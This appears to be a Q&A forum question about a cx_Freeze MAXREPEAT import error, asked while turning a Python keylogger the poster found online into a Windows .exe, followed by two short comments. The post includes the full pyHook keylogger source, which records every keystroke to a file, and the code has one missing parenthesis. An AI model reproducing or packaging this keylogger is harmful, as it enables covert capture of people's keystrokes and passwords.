# cx_Freeze program created from python won't run

Tags: python-3.3, importerror, cx-freeze

I am trying to create a .exe version of a python keylogger program that I found on the internet, so it can be run on Windows pc's without python installed. 
The code for the program as is follows:

```
import pythoncom, pyHook, sys, logging
LOG_FILENAME = 'C:\\important\\file.txt'
def Key_Press(Char):
    logging.basicConfig(filename=LOG_FILENAME,level=logging.DEBUG,format='%(message)s')
    if Char.Ascii==27:
        logging.log(10,'ESC')
    elif Char.Ascii==8:
        logging.log(10,'BACKSPACE'
    else:
        logging.log(10,chr(Char.Ascii))  
    if chr(Char.Ascii)=='¬':
        exit()
    return True

hm=pyHook.HookManager()
hm.KeyDown=Key_Press
hm.HookKeyboard()
pythoncom.PumpMessages()
```

After the .exe file has been created using the build function of cx_Freeze, the following error occurs in a separate error box when I run the file:

```
Cannot import traceback module
Exception: cannot import name MAXREPEAT
Original Exception: cannot import name MAXREPEAT
```

I don't have much knowledge of cx_Freeze at all, and would very much appreciate any help, as even when I have tried using simple programs such as a hello_world.py program, the .exe file doesn't appear to work.

Comment: That might have been a bug in an ealier version of cx_Freeze. Can you try installing the latest version and re-freezing?

Comment: I already have the latest version - 4.3.3. Released 5th May